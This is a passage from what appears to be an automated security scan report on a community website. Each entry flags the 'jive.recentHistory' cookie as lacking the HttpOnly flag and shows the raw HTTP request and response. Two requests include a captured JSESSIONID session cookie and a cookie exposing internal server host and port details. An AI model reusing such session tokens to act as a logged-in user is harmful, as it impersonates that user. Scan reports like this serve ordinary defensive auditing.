Set-Cookie: jive.recentHistory.-1=31342c323036343b31342c323033323b31342c323033373b31342c323032323b31342c323033303b31342c323032393b31342c323032383b31342c323036333b31342c323032373b31342c323032363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=126133 t=1313157064223215
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.50. https://www.x.com/community/ppx/sdks

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/sdks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/sdks HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032333b31342c323032343b31342c323036333b31342c323032323b31342c323036343b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:05 GMT; Path=/
Vary: User-Agent
JP: D=250524 t=1313157065371592
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.51. https://www.x.com/community/ppx/showcase

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:55 GMT; Path=/
Vary: User-Agent
JP: D=95160 t=1313156335154548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.52. https://www.x.com/community/ppx/showcase/ap_directory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase/ap_directory

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase/ap_directory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=626237 t=1313157082735465
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.53. https://www.x.com/community/ppx/support

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/support HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038323b31342c323134323b31342c323134333b31342c323134343b31342c323030353b31342c323134363b31342c323134353b31342c323034373b31342c323034363b31342c323034353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=62142 t=1313157079746964
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.54. https://www.x.com/community/ppx/system_status

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/system_status

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/system_status HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032323b31342c323033303b31342c323033373b31342c323032393b31342c323033323b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=141197 t=1313157063543336
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.55. https://www.x.com/community/ppx/testing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/testing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/testing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033323b31342c323033373b31342c323032393b31342c323033303b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b31342c323031383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=129679 t=1313157063076344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.56. https://www.x.com/community/ppx/training

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/training

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/training HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033343b31342c323032343b31342c323036343b31342c323032353b31342c323032333b31342c323036333b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=90627 t=1313157066413831
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.57. https://www.x.com/community/ppx/transaction_information

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/transaction_information

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/transaction_information HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032363b31342c323032303b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=127710 t=1313157060376316
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.58. https://www.x.com/community/ppx/vt

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/vt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/vt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031353b31342c323031333b31342c323234363b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=134897 t=1313157057107460
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.59. https://www.x.com/community/ppx/website_reporting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/website_reporting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/website_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033303b31342c323032373b31342c323036333b31342c323032383b31342c323032363b31342c323032393b31342c323032303b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=106773 t=1313157062233186
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.60. https://www.x.com/community/ppx/wpp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030393b31342c323030333b31342c323030383b31342c323031343b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=148526 t=1313157033667453
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.61. https://www.x.com/community/ppx/wpphosted

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpphosted

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpphosted HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323234363b31342c323031333b31342c323236393b31342c323031353b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=67132 t=1313157057503117
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.62. https://www.x.com/community/ppx/wps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wps HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030363b31342c323031333b31342c323236393b31342c323031353b31342c323031363b31342c323234363b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=181388 t=1313157058055328
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.63. https://www.x.com/community/ppx/xspaces

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=109016 t=1313156344652941
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.64. https://www.x.com/community/ppx/xspaces/accelerator

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/accelerator

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/accelerator HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=58190 t=1313157053423426
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.65. https://www.x.com/community/ppx/xspaces/certification

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/certification

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/certification HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=85471 t=1313157037367616
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.66. https://www.x.com/community/ppx/xspaces/cloud-computing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/cloud-computing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/cloud-computing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131323b31342c323035333b31342c323030373b31342c323035313b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:38 GMT; Path=/
Vary: User-Agent
JP: D=94000 t=1313157038315262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.67. https://www.x.com/community/ppx/xspaces/digital_goods

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/digital_goods

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/digital_goods HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034383b31342c323035313b31342c323131323b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:39 GMT; Path=/
Vary: User-Agent
JP: D=155072 t=1313157039623431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.68. https://www.x.com/community/ppx/xspaces/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/finance HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034393b31342c323131323b31342c323034383b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:40 GMT; Path=/
Vary: User-Agent
JP: D=82568 t=1313157040529050
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.69. https://www.x.com/community/ppx/xspaces/forums

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/forums

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

